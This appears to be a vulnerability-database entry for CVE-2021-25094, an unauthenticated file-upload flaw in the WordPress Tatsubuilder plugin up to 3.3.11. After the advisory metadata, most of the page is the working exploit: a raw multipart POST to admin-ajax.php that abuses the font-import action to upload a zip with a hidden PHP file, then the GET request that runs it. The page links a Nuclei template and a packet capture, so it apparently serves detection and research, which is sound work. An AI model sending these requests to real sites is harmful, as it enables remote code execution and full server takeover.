| Title | Wordpress Tatsubuilder <= 3.3.11 - Remote Code Execution |
|---|---|
| Author | iamnoooob,rootxharsh,pdresearch |
| Severity | High |
| Impact | Unauthenticated attackers can upload malicious PHP files via the font import feature, achieving remote code execution and complete server compromise. |
| Remediation | Fixed in 3.3.12 |
| CVSS Score | 8.1 |
| EPSS Score | 0.90199 |
| CVE ID | CVE-2021-25094 |
| CWE ID | CWE-306 |
| Tags | cve cve2021 wp wp-plugin wordpress tatsu rce vkev vuln |
An unrestricted file upload in WordPress Tatsubuilder plugin version <= 3.3.11 enables an unauthenticated attacker to perform a remote code execution (RCE) on the server host due to multiple weaknesses in the font import feature and put 100,000 websites at risk.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Connection: close
Content-Length: 464
Content-Type: multipart/form-data; boundary=a8bfdd88f26f754c25496d0dd4962d38
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
--a8bfdd88f26f754c25496d0dd4962d38
Content-Disposition: form-data; name="action"
add_custom_font
--a8bfdd88f26f754c25496d0dd4962d38
Content-Disposition: form-data; name="file"; filename="FdOIVthW.zip"
PK
.FdOIVthW.php��/�(PHM��WHJ,N53�OIM�OI�P���p5uO
70�20�J��6J�
q
I�M��KqQ״V�� ��PKLص�J D PK Lص�J D
.FdOIVthW.phpPK ; �
--a8bfdd88f26f754c25496d0dd4962d38--
GET /wp-content/uploads/typehub/custom/fdoivthw/.FdOIVthW.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-25094.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-25094.pcap
N/AN/A